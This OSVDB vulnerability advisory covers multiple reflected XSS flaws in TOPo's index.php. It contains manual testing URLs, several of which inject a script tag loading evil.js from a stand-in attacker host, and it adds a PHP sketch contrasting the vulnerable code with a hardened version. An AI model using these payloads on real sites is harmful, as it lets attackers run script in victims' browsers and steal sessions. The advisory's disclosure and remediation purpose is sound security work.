TOPo index.php Multiple Variable XSS

2005-05-20T04:29:52
ID OSVDB:16699
Type osvdb
Reporter Lostmon Lords (Lostmon@gmail.com)
Modified 2005-05-20T04:29:52

Description

Vulnerability Description

TOPo contains a flaw that allows a remote cross-site scripting attack. This flaw exists because the application does not validate the 'm', 's', 'ID', and 't' variables upon submission to the 'index.php' script. This could allow a user to create a specially crafted URL that would execute arbitrary script code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

Solution Description

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

Manual Testing Notes

http://[victim]/topo/index.php?m=top"><SCRIPT%20src=http://[attacker]/evil.js></script>&s=info&ID=1114815037.2498
http://[victim]/topo/index.php?m=top&s=info&ID=1115946293.3552"><SCRIPT%20src=http://[attacker]/evil.js></SCRIPT>&t=puntuar
http://[victim]/topo/index.php?m=top&s=info"><script>alert()</script>&ID=1115946293.3552&t=puntuar
http://[victim]/topo/index.php?m=top"><script>alert()</script>&s=info&ID=1115946293.3552&t=puntuar
http://[victim]/topo/index.php?m=top&s=info&t=comments&ID=1114815037.2498"><SCRIPT%20src=http://[attacker]/evil.js></script>
http://[victim]/topo/index.php?m=top&s=info&t=comments&paso=1&ID=1111068112.7598"><SCRIPT%20src=http://[attacker]/evil.js></script>
http://[victim]/topo/index.php?m=members&s=html&t=edit"><SCRIPT%20src=http://[attacker]/evil.js></script>

http://[victim]/topo/index.php?m=top&s=info&t=comments&paso=1&ID=1115946293.3552 (name, web, and email fields)
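As an added illustration (not TOPo's own code; the function names, the allowed values for 'm', 's' and 't', and the ID pattern are assumptions drawn from the description and the URLs above), a PHP sketch of the reflected-parameter pattern behind this class of flaw next to a hardened form that allowlists the routing parameters, constrains the ID format, and HTML-encodes every value on output:

```php
<?php
// Added example, not TOPo's code. Shows the defect class described in the advisory
// (query parameters reflected into HTML unchecked) and one way to close it.

// Assumed vulnerable pattern: the raw 'm' parameter is written straight into markup,
// so a value ending in "> breaks out of the attribute and the tag.
function render_vulnerable(array $get): string {
    $m = $get['m'] ?? 'top';
    return '<a href="index.php?m=' . $m . '&s=info">Top</a>';
}

// Hardened form. The allowed values are assumptions taken from the URLs in this record.
const ALLOWED_MODULES  = ['top', 'members'];
const ALLOWED_SECTIONS = ['info', 'html'];
const ALLOWED_ACTIONS  = ['puntuar', 'comments', 'edit'];

// Routing parameters are only ever compared against a fixed list, never echoed raw.
function pick(array $get, string $key, array $allowed, string $default): string {
    $v = $get[$key] ?? $default;
    return in_array($v, $allowed, true) ? $v : $default;
}

// IDs in this application look like "1114815037.2498" (Unix time plus a decimal suffix);
// anything else is rejected rather than reflected.
function valid_id(?string $id): ?string {
    return ($id !== null && preg_match('/^\d{10}\.\d{1,6}$/', $id)) ? $id : null;
}

// Output encoding for everything that reaches HTML, including the free-text
// name, web and email fields from the comments form.
function h(string $s): string {
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

function render_hardened(array $get): string {
    $m  = pick($get, 'm', ALLOWED_MODULES, 'top');
    $s  = pick($get, 's', ALLOWED_SECTIONS, 'info');
    $t  = pick($get, 't', ALLOWED_ACTIONS, 'comments');
    $id = valid_id($get['ID'] ?? null);
    if ($id === null) {
        return '<p>Invalid ID</p>';
    }
    // Build the query string from validated parts, then encode it for the attribute.
    $q = http_build_query(['m' => $m, 's' => $s, 't' => $t, 'ID' => $id]);
    return '<a href="index.php?' . h($q) . '">' . h($m) . '</a>';
}
```

Running `render_hardened(['m' => 'top"><script>alert()</script>', 'ID' => '1114815037.2498'])` falls back to the default module because the value is not in the allowlist, and any free-text field passed through `h()` is emitted with `<`, `>`, `"` and `'` encoded.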

References:

Vendor URL: http://ej3soft.ej3.net/index.php?m=info&s=topo&t=info
Security Tracker: 1014016
Secunia Advisory ID: 15325
Related OSVDB ID: 16700
Other Advisory URL: http://lostmon.blogspot.com/2005/05/topo-22-multiple-variable-fields-xss.html
CVE-2005-1715
Bugtraq ID: 13700
Bugtraq ID: 13701